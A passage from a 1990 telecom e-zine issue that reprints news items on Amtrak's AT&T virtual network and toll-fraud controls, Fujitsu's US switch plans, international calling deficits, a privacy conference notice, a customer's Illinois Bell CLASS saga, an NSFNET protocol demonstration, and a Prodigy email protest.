|
onto a virtual private network-taking advantage of an AT&T promotion that saved
|
|
the railroad $250,000. Though Amtrak realized the cost-savings potential of
|
|
AT&T's Software Defined Network (SDN) as early as May 1987, it took until last
|
|
spring for the company to move full-speed ahead with implementation of that
|
|
virtual private network service. "We had led the horse to water, but we
|
|
couldn't make it drink," said Jim West, an AT&T national systems consultant.
|
|
|
|
But in April of this year, AT&T removed the last obstacle in the
|
|
railroad's way, said Amtrak's chief network engineer Matt Brunk. At that time,
|
|
AT&T began running a special promotion that waived the installation fee for
|
|
connecting sites to the SDN. Until then, Amtrak, based here, could only afford
|
|
adding locations piecemeal.
|
|
|
|
Plagued by network abuse, Amtrak began tracking the potential of SDN as a
|
|
means of solving that problem as soon as AT&T announced its SDN rates in
|
|
December 1986. Describing the severity of its toll-fraud problem, Brunk told
|
|
of a seven-day stint in 1985 during which hackers tallied $185,000 in
|
|
unauthorized charges. By the end of that year, toll fraud on Amtrak's network
|
|
reached in excess of $1 million.
|
|
|
|
Before the days of the virtual private network, the only way to clean up
|
|
this abuse was through a toll-free "800" service configuration and PBX remote
|
|
access, which Amtrak implemented at the end of 1985. "We changed the policy
|
|
and procedures for all users, limiting the capabilities of remotaccess," Brunk
|
|
said.
|
|
|
|
But Amtrak needed to further patrol its network, and after studying AT&T's
|
|
SDN, as well as competitive offerings, the railroad ordered in May 1987 the
|
|
first portion of what would this year become a 300-site SDN. The initial order
|
|
included AT&T Accunet T1.5 circuits for just two stations, one in Chicago and
|
|
one here. Used to replace the 800 service, these 1.544-megabit-per-second
|
|
direct connections were used to "provide secure remote access to on-net numbers
|
|
for numerous users," Brunk said.
|
|
|
|
Equally important, Amtrak also signed up for the Network Remote Access
|
|
Fraud Control feature, which gives it a single point of control over the
|
|
network. "What Amtrak ordered then was not really a network, because it was
|
|
feature-specific," said AT&T national account manager Sharon Juergens.
|
|
|
|
The company has not billed back or dropped any toll fraud since it began
|
|
using the SDN remote access feature, Brunk said. "Anyone with PBX
|
|
remote-access capability and :heavy! volume not using SDN as a vehicle is
|
|
doing their company a disservice."
|
|
|
|
Originally a beta-test site for the SDN's security-report feature, Amtrak
|
|
has since come to rely heavily on that option, too. With the exception of some
|
|
group codes, a warning is sent if spending on any user code exceeds $60 per
|
|
month. "We begin investigating immediately," Brunk said. "We are now
|
|
proactive, instead of reactive."
|
|
|
|
Today, 40 Amtrak locations have switched-access connections to the SDN;
|
|
260 sites are linked through dedicated means, whether through voice-grade
|
|
analog circuits or high-speed T1s. "The users' traffic is discounted, on a
|
|
single billing statement, and in effect, :the SDN! links them to the company.
|
|
This is our corporate communications glue," Brunk said. "But this is only the
|
|
beginning. Not only have we provided a service, but also we have provided a
|
|
bright future. We have set ourselves up for competitive gain." Spending
|
|
Stabilized And the company has stabilized telecommunications expenditures. In
|
|
1985, Amtrak spent $26 million on telecom equipment and services. Four years
|
|
later, Brunk estimated the railroad will spend just $1 million more. He said
|
|
contributing factors to this will be the SDN, upgrading from outdated analog
|
|
PBXs to digital PBXs and replacing some PBX installations with local
|
|
Bell-provided centrex service. Network savings resulting from reduced
|
|
call-setup time alone, Brunk added, will reach $74,000 this year.
|
|
|
|
"In a nutshell, we have improved transmission quality, network management
|
|
and maintenance, and reduced costs," Brunk said. "The users have gained a
|
|
single authorization code accessing multiple applications, improved quality and
|
|
support."
|
|
|
|
Cost savings aside, Amtrak also took into consideration applications
|
|
available off the SDN. "At the time, of what was available, we really liked
|
|
everything about SDN," Brunk said.
|
|
|
|
The Amtrak network is supported by the dedicated access trunk testing
|
|
system. This system lets Amtrak test access lines, thus aiding the company in
|
|
activating and deactivating authorization codes. And Amtrak is testing the
|
|
AT&T Alliance dedicated teleconferencing service.
|
|
|
|
With the teleconferencing service, Amtrak can reduce internal travel
|
|
expenditures: Users can access the system remotely via an 800 number, or on
|
|
demand. Amtrak operators can connect teleconferencing calls at any time. "The
|
|
quality is fantastic, but the cost is even better because it's all connected to
|
|
the SDN," said Brunk.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
|
|
|
|
K N I G H T L I N E
|
|
|
|
Issue 01/Part II of III
|
|
|
|
17th of November, 1990
|
|
|
|
Written, compiled,
|
|
|
|
and edited by Doc Holiday
|
|
|
|
KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
|
|
|
|
---
|
|
F R O M T H E W I R E
|
|
_______________________________________________________________________________
|
|
|
|
HEADLINE ADAPTING DIGITAL SWITCH -- Fujitsu To Expand In U.S.
|
|
Byline: ROBERT POE
|
|
DATE 11/15/90
|
|
SOURCE COMMUNICATIONSWEEK (CWK)
|
|
Issue: 322
|
|
Section: PUBLIC NETWORKING
|
|
Page: 33
|
|
(Copyright 1990 CMP Publications, Inc. All rights reserved.)
|
|
|
|
RALEIGH, N.C.-Fujitsu Ltd. is boosting efforts to adapt its digital exchange
|
|
to the U.S. network, in anticipation of the $40 billion public switch
|
|
changeout expected in the United States over the next 10 to 15 years.
|
|
|
|
Fujitsu plans to increase the number of U.S. staff members in charge of
|
|
selling and engineering the Fetex-150 switch to 600 by 1994 from the current
|
|
100, officials at the Tokyo-based company said.
|
|
|
|
The increase will shift development of sophisticated switch features from Japan
|
|
to the United States, said one observer familiar with Fujitsu Network Switching
|
|
of America Inc., based here.
|
|
|
|
FILLING U.S. NEEDS
|
|
|
|
Most of the current staff there is working on testing the performance and
|
|
network conformance of software developed in Japan, the observer said. With
|
|
the expansion, the subsidiary will be responsible for developing functions and
|
|
capabilities required by U.S. customers.
|
|
|
|
The Fetex-150 is Fujitsu's export-model exchange switch, with more than 8.8
|
|
million lines installed or on order in 17 countries. None have been sold in
|
|
the United States, but the recently announced plans confirm longstanding
|
|
speculation that the Japanese manufacturer is planning a major push into the
|
|
U.S.
|
|
|
|
When Fujitsu won a major switch tender in Singapore last autumn, competitors
|
|
complained it was selling the equipment at cost to win a prestigious contract
|
|
that would serve as a stepping-stone to the United States.
|
|
|
|
WOOING THE BELLS
|
|
|
|
Fujitsu said its switch has passed Phase 1 and Phase 2 evaluations by Bell
|
|
Communications Research Inc., Livingston, N.J., the research arm of the seven
|
|
U.S. regional Bell companies. Although the Bellcore certification is
|
|
considered essential to selling to the Bells-which account for about 75 percent
|
|
of U.S. telephone lines-it may not be enough for the company to break into a
|
|
market dominated by AT&T and Nashville, Tenn.-based Northern Telecom Inc.
|
|
|
|
Those two manufacturers have more than 90 percent of the U.S. market. A share
|
|
like that, coupled with Bell company inertia in changing to new suppliers,
|
|
leaves foreign public switch manufacturers largely out in the cold, analysts
|
|
said.
|
|
|
|
The U.S. subsidiaries of Siemens AG, L.M. Ericsson Telephone Co., NEC Corp.
|
|
and GEC Plessey Telecommunications Ltd. have found the U.S. market tough to
|
|
crack, though each has had limited success and is further along than Fujitsu.
|
|
|
|
`INHERENT CONSERVATISM'
|
|
|
|
"There's an inherent conservatism on the part of their {U.S.} customer base,"
|
|
said Robert Rosenberg, director of analytical services at The Eastern
|
|
Management Group, Parsippany, N.J. "These are huge companies with billions of
|
|
dollars invested in their current equipment.
|
|
|
|
"Even if Fujitsu comes up with a switch that has all the bells and whistles
|
|
that an engineer could ever want, if all the support systems have to be rebuilt
|
|
in order to fit that switch into the network, his manager won't let him install
|
|
it," Rosenberg said.
|
|
|
|
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
Telephone Services: A Growing Form Of "Foreign Aid"
|
|
|
|
Keith Bradsher, {The New York Times}, Sunday, October 21, 1990
|
|
(Business section, page 5)
|
|
|
|
Americans who make international telephone calls are paying extra to
|
|
subsidize foreign countries' postal rates, local phone service, even
|
|
schools and armies.
|
|
|
|
These subsidies are included in quarterly payments that American
|
|
telephone companies must make to their counterparts overseas, most of
|
|
these are state-owned monopolies. The net payments, totaling $2.4
|
|
billion last year, form one of the fastest-growing pieces of the
|
|
American trade deficit, and prompted the Federal communications
|
|
Commission this summer to begin an effort that could push down the
|
|
price that consumers pay for an international phone call by up to 50
|
|
percent within three years.
|
|
|
|
The imbalance is a largely unforeseen side effect of the growth of
|
|
competition in the American long-distance industry during the 1980's.
|
|
The competition drove down outbound rates from the United States,
|
|
while overseas monopolies kept their rates high.
|
|
|
|
The result is that business and families spread among countries try
|
|
to make sure that calls originate in the United States. Outbound
|
|
calls from the United States now outnumber inbound calls by 1.7-to-1,
|
|
in minutes -- meaning American phone companies have to pay fees for
|
|
the surplus calls. The F.C.C. is concerned that foreign companies are
|
|
demanding much more money than is justified, given the steeply falling
|
|
costs of providing service, and proposes to limit unilaterally the
|
|
payments American carriers make.
|
|
|
|
Central and South American countries filed formal protests against
|
|
the F.C.C.'s plan on October 12. Although developed countries like
|
|
Britain and Japan account for more than half of United States
|
|
international telephone traffic, some of the largest imbalances in
|
|
traffic are with developing countries, which spend the foreign
|
|
exchange on everything from school systems to weapons. The deficit
|
|
with Columbia, for example, soared to $71 million last year.
|
|
|
|
International charges are based on formulas assigning per-minute
|
|
costs of receiving and overseas call and routing it within the home
|
|
country. But while actual costs have dropped in recent years, the
|
|
formulas have been very slow to adjust, if they are adjusted at all.
|
|
For example, while few international calls require operators, the
|
|
formulas are still based on such expenses.
|
|
|
|
Furthermore, the investment required for each telephone line in an
|
|
undersea cable or aboard a satellite has plummeted with technological
|
|
advances. A trans-Pacific cable with 600,000 lines, announced last
|
|
Wednesday and scheduled to go into service in 1996, could cost less
|
|
than $1,000 per line.
|
|
|
|
Yet the phone company formulas keep charges high. Germany's Deutsche
|
|
Bundespost, for example, currently collects 87 cents a minute from
|
|
American carriers, which actually lose money on some of the off-peak
|
|
rates they offer American consumers.
|
|
|
|
MORE CALLS FROM THE U.S. ARE GENERATING A GROWING TRADE DEFICIT
|
|
|
|
U.S. telephone companies charge less for 1980 0.3 (billions of
|
|
overseas calls than foreign companies 1981 0.5 U.S. dollars)
|
|
charge for calls the United States. So 1982 0.7
|
|
more international calls originate in the 1983 1.0
|
|
United States. But the U.S. companies pay 1984 1.2
|
|
high fees to their foreign counterparts for 1985 1.1
|
|
handling those extra calls, and the deficit 1986 1.4
|
|
has ballooned in the last decade. 1987 1.7
|
|
1988 2.0
|
|
1989 2.4 (estimate)
|
|
(Source: F.C.C.)
|
|
|
|
THE LONG DISTANCE USAGE IMBALANCE
|
|
|
|
Outgoing and incoming U.S. telephone traffic, in 1988, the latest year
|
|
for which figures are available, in percent.
|
|
|
|
Whom are we calling? Who's calling us?
|
|
Total outgoing traffic: Total incoming traffic:
|
|
5,325 million minutes 3,155 million minutes
|
|
|
|
Other: 47.9% Other: 32.9%
|
|
Canada: 20.2% Canada: 35.2%
|
|
Britain: 9.1% Britain: 12.6%
|
|
Mexico: 8.8% Mexico: 6.2%
|
|
W. Germany: 6.9% W. Germany: 5.4%
|
|
Japan: 4.4% Japan: 4.3%
|
|
France: 2.7% France: 3.4%
|
|
|
|
(Source: International Institute of Communications)
|
|
|
|
COMPARING COSTS: Price range of five-minute international calls between
|
|
the U.S. and other nations. Figures do not include volume discounts.
|
|
|
|
Country From U.S.* To U.S.
|
|
|
|
Britain $2.95 to $5.20 $4.63 to $6.58
|
|
Canada (NYC to $0.90 to $2.25 $1.35 to $2.26
|
|
Montreal)
|
|
France $3.10 to $5.95 $4.72 to $7.73
|
|
Japan $4.00 to $8.01 $4.67 to $8.34
|
|
Mexico (NYC to $4.50 to $7.41 $4.24 to $6.36
|
|
Mexico City)
|
|
West Germany $3.10 to $6.13 $10.22
|
|
|
|
* For lowest rates, callers pay a monthly $3 fee.
|
|
(Source: A.T.&T.)
|
|
|
|
WHERE THE DEFICIT FALLS: Leading nations with which the United States
|
|
has a trade deficit in telephone services, in 1989, in millions of
|
|
dollars.
|
|
|
|
Mexico: $534
|
|
W. Germany: 167
|
|
Philippines: 115
|
|
South Korea: 112
|
|
Japan: 79
|
|
Dominican Republic: 75
|
|
Columbia: 71
|
|
Italy: 70 (Source: F.C.C.)
|
|
Israel: 57
|
|
Britain: 46
|
|
|
|
THE RUSH TOWARD LOWER COSTS: The cost per telephone line for laying
|
|
each of the eight telephone cables that now span the Atlantic Ocean,
|
|
from the one in 1956, which held 48 lines, to the planned 1992 cable
|
|
which is expected to carry 80,000 lines. In current dollars.
|
|
|
|
1956 $557,000
|
|
1959 436,000
|
|
1963 289,000
|
|
1965 365,000
|
|
1970 49,000
|
|
1976 25,000
|
|
1983 23,000 (Source, F.C.C.)
|
|
1988 9,000
|
|
1992 5,400 (estimate)
|
|
|
|
|
|
|
|
_______________________________________________________________________________
|
|
|
|
A few notes from Jim Warren in regards to the CFP conference:
|
|
|
|
|
|
Greetings,
|
|
Some key issues are now settled, with some minor remain for resolution.
|
|
|
|
CONFERENCE DATES, LOCATION & MAXIMUM SIZE
|
|
|
|
We have finally completed site selection and contracted for the Conference
|
|
facility. Please mark your calendars and spread the word:
|
|
|
|
First Conference on Computers, Freedom & Privacy
|
|
March 25-28,1991, Monday-Thursday
|
|
SFO Marriott, Burlingame, California
|
|
(just south of San Francisco International Airport;
|
|
on the San Francisco Peninsula, about 20 minutes from "The City")
|
|
maximum attendance: 600
|
|
|
|
PLEASE NOTE NAME CHANGE
|
|
|
|
We have found *ample* issues for a very robust Conference, limited only to
|
|
computer-related issues of responsible freedom and privacy. After questions
|
|
regarding satellite surveillance, genetic engineering, photo traffic radar,
|
|
wireless phone bugs, etc., we decided to modify the Conference title for
|
|
greater accuracy. We have changed it from "Technology, Freedom & Privacy" to
|
|
"Computers, Freedom & Privacy."
|
|
|
|
ONE MORE NIT TO PICK
|
|
|
|
Until recently, our draft title has included, "First International Conference".
|
|
|
|
We most definitely are planning for international participation, especially
|
|
expecting presentations from EEC and Canadian privacy and access agencies.
|
|
These will soon have significant impacts on trans-border dataflow and inter-
|
|
national business communications.
|
|
|
|
However, we were just told that some agencies require multi-month clearance
|
|
procedures for staff attending any event with "International" in its title.
|
|
|
|
**Your input on this and the minor issue of whether to include "International"
|
|
in our Conference title would be appreciated.**
|
|
|
|
ATTRIBUTION (BLAME)
|
|
|
|
We are building the first bridge connecting the major, highly diverse villages
|
|
of our new electronic frontier. Such construction involves some degree of
|
|
exploration and learning.
|
|
|
|
These title-changes are a result of that learning process. Please attribute
|
|
all responsibility for the fluctuating Conference title to me, personally. I
|
|
am the one who proposed the first title; I am the one who has changed it to
|
|
enhance accuracy and avoid conflict.
|
|
|
|
Of course, the title will be settled and finalized (with your kind assistance)
|
|
before the Conference is formally announced and publicity statements issued --
|
|
soon!
|
|
|
|
Thanking you for your interest and continued assistance, I remain, Sincerely,
|
|
|
|
--Jim Warren, CFP Conf Chair
|
|
jwarren@well.ca.sf.us
|
|
|
|
_______________________________________________________________________________
|
|
|
|
[Reprented from TELECOM digest. --DH]
|
|
|
|
|
|
FROM: Patrick Townson <telecom@eecs.nwu.edu>
|
|
SUBJECT: Illinois Bell Shows Real CLASS
|
|
|
|
For several months now, Illinois Bell has been hawking CLASS. Brochures
|
|
in the mail with our bills and newspaper advertisements have told us about the
|
|
wonderful new services soon to be offered.
|
|
|
|
It was just a question, they said, of waiting until your central office had
|
|
been converted. The new features being offered are:
|
|
|
|
*66 Auto Call Back: Call back the last number which called you. No
|
|
need to know the number.
|
|
|
|
*69 Repeat Dial: If the number you dialed was busy, punching
|
|
this will keep trying the number for up to
|
|
30 minutes, and advise you when it can connect.
|
|
|
|
*60 Call Screening Enter:
|
|
# plus number to be screened out plus #
|
|
* plus number to be re-admitted plus *
|
|
# plus 01 plus # to add the number of the
|
|
last call you received, whether or not
|
|
you know the number.
|
|
1 To play a list of the numbers being screened.
|
|
0 For a helpful recording of options, etc.
|
|
|
|
Distinctive Ringing Up to ten numbers can be programmed in. When a
|
|
call is received from one of these numbers, your
|
|
phone will give a special ring to advise you.
|
|
|
|
Multi-Ring Service Two additional numbers can be associated with
|
|
your number. When someone dials one of these
|
|
two numbers, your phone will give a special ring.
|
|
|
|
With both Distinctive Ringing and Multi-Ring Service, if you have Call Waiting,
|
|
the Call Waiting tones will be different from the norm also, so that you can
|
|
tell what is happening. With Multi-Ring Service, you can have it programmed so
|
|
the supplementary numbers associated with your main number are forwarded when
|
|
it is forwarded, or do not observe forwarding, and 'ring through' despite what
|
|
the main number is doing.
|
|
|
|
Alternate Answer Can be programmed so that after 3-7 rings,
|
|
the unanswered call will be automatically sent
|
|
to another line *WITHIN YOUR CENTRAL OFFICE*.
|
|
|
|
If the number assigned as an alternate is
|
|
itself busy or forwarded OUTSIDE YOUR OFFICE
|
|
then Alternate Answer will not forward the
|
|
call and continue to ring unanswered.
|
|
|
|
Transfer on Busy/ This is just another name for 'hunt'. The
|
|
No Answer difference is that hunt is free; Transfer on
|
|
Busy/NA costs a couple bucks per month. Like
|
|
Alternate Answer, it must forward only to a
|
|
number on the same switch. Unlike hunt, it
|
|
will work on NA as well. Unlike Alternate
|
|
Answer, it works on busy as well.
|
|
|
|
Caller*ID will be available 'eventually' they say.
|
|
|
|
Now my story begins:
|
|
|
|
From early this summer to the present, I've waited patiently for CLASS to
|
|
be available in Chicago-Rogers Park. Finally a date was announced: October 15
|
|
the above features would be available. In mid-September, I spoke with a rep in
|
|
the Irving-Kildare Business Office. She assured me *all* the above features
|
|
would be available on October 15. My bill is cut on the 13th of each month,
|
|
and knowing the nightmare of reading a bill which has had changes made in
|
|
mid-month (page after page of pro-rata entries for credits on the old service,
|
|
item by item; pro-rata entries for the new service going in, etc) it made sense
|
|
to implement changes on the billing date, to keep the statement simple.
|
|
|
|
She couldn't write the order for the service to start October 13, since
|
|
CLASS was not officially available until the fifteenth. Well, okay, so its
|
|
either wait until November 13 or go ahead and start in mid-month, worrying
|
|
about reading the bill once it actually arrives.
|
|
|
|
I've been ambivilent about CLASS since it is not compatible with my
|
|
present service 'Starline', but after much thought -- and since all
|
|
installation and order-writing on Custom Calling features is free now through
|
|
December 31! -- I decided to try out the new stuff.
|
|
|
|
She took the order Wednesday afternoon and quoted 'sometime Thursday' for
|
|
the work to be done. In fact it was done -- or mostly done -- by mid-afternoon
|
|
Thursday. But I should have known better. I should have remembered my
|
|
experience with Starline three years ago, when it took a technician in the
|
|
central office *one week* to get it all in and working correctly. Still, I
|
|
took IBT's word for it.
|
|
|
|
I got home about 5:30 PM Thursday. *You know* I sat down right away at
|
|
the phone to begin testing the new features! :) The lines were to be equipped
|
|
as follows:
|
|
|
|
Line 1: Call Waiting Line 2: Call Forwarding
|
|
Three Way Calling Speed Dial 8
|
|
Call Forwarding Busy Repeat Dialing *69
|
|
Speed Dial 8
|
|
Auto Call Back *66 (second line used mostly by modem;
|
|
Busy Repeat Dialing *69 so Call Waiting undesirable)
|
|
Call Screening *60
|
|
Alternate Answer (supposed to be programmed to Voice Mail;
|
|
another CO; another area code U708e;
|
|
even another telco UCentele).
|
|
|
|
Busy Repeat Dialing did not work on the second line (not installed) and
|
|
Alternate Answer worked (but not as I understood it would) on the first line.
|
|
Plus, I had forgotten how to add 'last call received' to the screening feature.
|
|
|
|
It is 5:45 ... business office open another fifteen minutes ... good! I
|
|
call 1-800-244-4444 which is IBT's idea of a new way to handle calls to the
|
|
business office. Everyone in the state of Illinois calls it, and the calls go
|
|
wherever someone is free. Before, we could call the business office in our
|
|
neighborhood direct ... no longer.
|
|
|
|
I call; I go on hold; I wait on hold five minutes. Finally a rep comes on
|
|
the line, a young fellow who probably Meant Well ...
|
|
|
|
After getting the preliminary information to look up my account, we begin
|
|
our conversation:
|
|
|
|
Me: You see from the order the new features put on today?
|
|
Him: Yes, which ones are you asking about?
|
|
Me: A couple questions. Explain how to add the last call received to
|
|
your call screening.
|
|
Him: Call screening? Well, that's not available in your area yet. You
|
|
see, it will be a few months before we offer it.
|
|
Me: Wait a minute! It was quoted to me two days ago, and it is on
|
|
the order you are reading now is it not?
|
|
UI read him the order number to confirm we had the same one.e
|
|
|
|
Him: Yes, it is on here, but it won't work. No matter what was written
|
|
up. Really, I have to apologize for whoever would have taken your
|
|
order and written it there.
|
|
|
|
Me: Hold on, hold on! It *is* installed, and it *is* working! I want
|
|
to know how to work it.
|
|
|
|
Him: No it is not installed. The only features we can offer you at
|
|
at this time are Busy Redial and Auto Callback. Would you like me
|
|
to put in an order for those?
|
|
|
|
Me: Let's talk to the supervisor instead.
|
|
|
|
Him: (in a huff) Gladly sir.
|
|
|
|
Supervisor comes on line and repeats what was said by the rep: Call
|
|
Screening is not available at this time in Chicago-Rogers Park.
|
|
|
|
At this point I am furious ...
|
|
|
|
Me: Let me speak to the rep who took this order (I quoted her by
|
|
name.)
|
|
|
|
Supervisor: I never heard of her. She might be in some other office.
|
|
|
|
Me: (suspicious) Say, is this Irving-Kildare?
|
|
|
|
Supervisor: No! Of course not! I am in Springfield, IL.
|
|
|
|
Me: Suppose you give me the name of the manager at Irving-Kildare
|
|
then, and I will call there tomorrow. (By now it was 6 PM; the
|
|
supervisor was getting figity and nervous wanting to go home.)
|
|
|
|
Supervisor: Here! Call this number tomorrow and ask for the manager of
|
|
that office, 1-800-244-4444.
|
|
|
|
Me: Baloney! Give me the manager's direct number!
|
|
|
|
Supervisor: Well okay, 312-xxx-xxxx, and ask for Ms. XXXX.
|
|
|
|
Me: (suspicious again) She is the manager there?
|
|
|
|
Supervisor: Yes, she will get you straightened out. Goodbye!
|
|
|
|
Comes Friday morning, I am on the phone a few minutes before 9 AM, at the
|
|
suggested direct number. Ms. XXXX reviewed the entire order and got the Busy
|
|
Repeat Dial feature added to line two ... but she insisted the original rep
|
|
was 'wrong for telling you call screening was available ..' and the obligatory
|
|
apology for 'one of my people who mislead you'. I patiently explained to her
|
|
also that in fact call screening was installed and was working.
|
|
|
|
Manager: Oh really? Are you sure?
|
|
|
|
Me: I am positive. Would you do me a favor? Call the foreman and have
|
|
him call me back.
|
|
|
|
Manager: Well, someone will call you later.
|
|
|
|
Later that day, a rep called to say that yes indeed, I was correct. It
|
|
seems they had not been told call screening was now available in my office. I
|
|
told her that was odd, considering the rep who first took the order knew all
|
|
about it.
|
|
|
|
I asked when the Alternate Answer 'would be fixed' (bear in mind I thought
|
|
it would work outside the CO, which it would not, which is why it kept ringing
|
|
through to me instead of forwarding.)
|
|
|
|
She thought maybe the foreman could figure that out.
|
|
|
|
Maybe an hour later, a techician did call me to say he was rather
|
|
surprised that call screening was working on my line. He gave a complete and
|
|
concise explanation of how Alternate Answer and Transfer on Busy/No Answer was
|
|
to work. He offered to have it removed from my line since it would be of no
|
|
value to me as configured.
|
|
|
|
One question he could not answer: How do you add the last call received
|
|
to call screening? He could find the answer nowhere, but said he would see to
|
|
it I got 'the instruction booklet' in the mail soon, so maybe I could figure it
|
|
out myself.
|
|
|
|
I got busy with other things, and put the question aside ... until early
|
|
Saturday morning when I got one of my periodic crank calls from the same number
|
|
which has plagued me for a couple months now with ring, then hangup calls on an
|
|
irregular basis.
|
|
|
|
For the fun of it, I punched *69, and told the sassy little girl who
|
|
answered the phone to quit fooling around. She was, to say the least,
|
|
surprised and startled by my call back. I don't think I will hear from her
|
|
again. :)
|
|
|
|
But I decided to ask again how to add such a number to call screening,
|
|
so I called Repair Service.
|
|
|
|
The Repair Service clerk pulled me up on the tube *including the work
|
|
order from two days earlier* and like everyone else said:
|
|
|
|
Repair: You don't have Call Screening on your line. That is not
|
|
available yet in your area. We are adding new offices daily,
|
|
blah, blah.
|
|
|
|
I *couldn't believe* what I was hearing ... I told her I did, and she
|
|
insisted I did not ... despite the order, despite what the computer said.
|
|
Finally it was on to her supervisor, but as it turned out, her supervisor was
|
|
the foreman on duty for the weekend. Like the others, he began with apologies
|
|
for how I 'had been misinformed' ... no call screening was available.
|
|
|
|
Me: Tell ya what. You say no, and I say yes. You're on the test
|
|
board, no? I'll hang up. You go on my line, dial *60, listen to
|
|
the recording you hear, then call me back. I will wait here. Take
|
|
your time. When you call back, you can apologize.
|
|
|
|
Foreman: Well, I'm not on the test board, I'm in my office on my own
|
|
phone.
|
|
|
|
Me: So go to the test board, or pick me up in there wherever it is
|
|
handy and use my line. Make a few calls. Add some numbers to the
|
|
call screening; then call me back with egg on your face, okay?
|
|
|
|
Foreman: Are you saying call screening is on your line and you have
|
|
used it?
|
|
|
|
Me: I have used it. Today. A few minutes ago I played with it.
|
|
|
|
Foreman: I'll call you back.
|
|
|
|
(Fifteen minutes later) ...
|
|
|
|
|
|
Foreman: Mr. Townson! Umm ... I have been with this company for 23
|
|
years. I'll get to the point: I have egg on my face. Not mine
|
|
really, but the company has the egg on the face. You are correct;
|
|
your line has call screening.
|
|
|
|
Me: 23 years you say? Are you a member of the Pioneers?
|
|
|
|
Foreman: (surprised) Why, uh, yes I am.
|
|
|
|
Me: Fine organization isn't it ...
|
|
|
|
Foreman: Yes, it certainly is. You know of them?
|
|
|
|
Me: I've heard a few things.
|
|
|
|
Foreman: Look, let me tell you something. I did not know -- nor *did
|
|
anyone in this office know* that call screening was now available. We
|
|
were told it was coming, that's all.
|
|
|
|
Me: You mean no one knew it was already in place?
|
|
|
|
Foreman: No, apparently not ... I think you are the only customer in
|
|
the Rogers Park office who has it at this time. Because the
|
|
assumption was it was not yet installed, the reps were told not to
|
|
take orders for it ... I do not know how your order slipped through.
|
|
|
|
Me: Will you be telling others?
|
|
|
|
Foreman: I have already made some calls, and yes, others will be told
|
|
about this on Monday.
|
|
|
|
Me: Well, you know the *81 feature to turn call screening on and off
|
|
is still not working.
|
|
|
|
Foreman: I'm not surprised. After all, none of it is supposed to be
|
|
working right now. You seem to know something about this business,
|
|
Mr. Townson.
|
|
|
|
Me: I guess I've picked up a few things along the way.
|
|
|
|
We then chatted about the Transfer on Busy/No Answer feature. I asked
|
|
why, if my cell phone on 312-415-xxxx had the ability to transfer calls out of
|
|
the CO and be programmed/turned on and off from the phone itself, my wire line
|
|
could not. 312-415 is out of Chicago-Congress ... he thought it might have to
|
|
do with that office having some different generics than Rogers Park ... but he
|
|
could not give a satisfactory answer.
|
|
|
|
|
|
Patrick Townson
|
|
|
|
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
The following article appeared in the U-M Computing Center News
|
|
(October 25, 1990, V 5, No 18, Pg 10)
|
|
|
|
[This article was also reprinted in TELECOM digest -DH]
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
NSFNET DEMONSTRATES INTERCONTINENTAL ISO TRANSMISSION
|
|
|
|
[Editor's note: The following article is reprinted, with modifications,
|
|
from the September 1990 issue of the Link Letter (Vol 3, No 4),
|
|
published by the Merit/NSFNET backbone project]
|
|
|
|
At the end of September, partners in the National Science Foundation Network
|
|
(NSFNET) announced a succesful demonstration of intercontinental data
|
|
transmission using the International Standards Organization Conectionless
|
|
Network Protocol (ISO CLNP). The international exchange of ISO CLNP packets
|
|
was demonstrated betweeen end systems at the NSFNET Network Operations Center
|
|
in Ann Arbor and in Bonn, West Germany, using the NSFNET backbone
|
|
infrastructure and the European Academic Supercomputer Initiative (EASInet)
|
|
backbone.
|
|
|
|
The prototype OSI implementation is intended to provide wide area connectivity
|
|
between OSI networks, including networks using the DECNet Phase V protocols.
|
|
|
|
The new software was integrated into the NSFNET's "packet switching" (data
|
|
transmission) nodes by David Katz and Susan Hares of the Merit Computer
|
|
Network, with support from IBM's software developement departments in Milford,
|
|
CT and Yorktown Heights, NY.
|
|
|
|
NSFNET is the first federally supported computer network to acheive
|
|
international ISO CLNP transmission on an operating network, according to
|
|
Merit's Hans-Werner Braun, Principle Investigator for the NSFNET Project.
|
|
|
|
The Prototype ISO implementation is being designed to coexist with NSFNET's
|
|
operational Internet Protocol (IP) network, and is a significant step towards
|
|
offering ISO services on the NSFNET backbone. Eric Aupperle, President of
|
|
Merit and acting director of ITD Network Systems, says that "the demonstration
|
|
shows that we're capable of transporting ISO traffic. Now we're working to
|
|
deploy this experimental service as fast as possible."
|
|
|
|
An implementation of CLNP was first demonstrated by Merit/NSFNET staff at the
|
|
InterOp '89 conference. That implementation of CLNP was originally developed
|
|
as part of the ARGO project at the University of Wisconsin, Madision, with the
|
|
support of the IBM Corporation.
|
|
|
|
by Ken Horning
|
|
DTD Network Systems.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
{Middlesex News}, Framingham, Mass., 11/2/90
|
|
|
|
Prodigy Pulls Plug on Electronic Mail Service For Some
|
|
|
|
By Adam Gaffin
|
|
|
|
NEWS STAFF WRITER
|
|
|
|
Users of a national computer network vow to continue a protest against
|
|
censorship and a new charge for electronic mail even though the company kicked
|
|
them off-line this week.
|
|
|
|
Brian Ek, spokesman for the network, Prodigy, said the "handful" of users had
|
|
begun harassing other users and advertisers on the service and that some had
|
|
even created programs "to flood members' 'mailboxes' with (thousands of)
|
|
repeated and increasingly strident harangues," he said.
|
|
|
|
But leaders of the protest say they sent only polite letters -- approved by the
|
|
company's legal department -- using techniques taught by the company itself.
|
|
Up to nine of them had their accounts pulled hips week.
|
|
|
|
Protests began in September when the company said it would cut unlimited
|
|
electronic mail from its monthly fee -- which includes such services as on-line
|
|
airline reservations, weather and games -- and would charge 25 cents for every
|
|
message above a monthly quota of 30. Ek says the design of the Prodigy network
|
|
makes "e-mail" very expensive and that few users send more than 30 messages a
|
|
month.
|
|
|
|
But Penny Hay, the only organizer of the "Cooperative Defense Committee" whose
|
|
account was not shut this week, said she and others are upset with Prodigy's
|
|
"bait and switch" tactics: The company continues to promote "free" electronic
|
|
mail as a major feature. She said Prodigy itself had spurred use of e-mail by
|
|
encouraging subscribers to set up private e-mail ``lists'' rather than use
|
|
public forums and that the charges will especially hurt families, because the
|
|
quota is per household, not person.
|
|
|
|
Ek said relatively few members protested the rate chqange. Gary Arlen, who
|
|
publishes a newsletter about on-line services, called the controversy "a
|
|
tempest in a teapot."
|
|
|
|
Hay, however, said the group now has the backing of nearly 19,000 Prodigy users
|
|
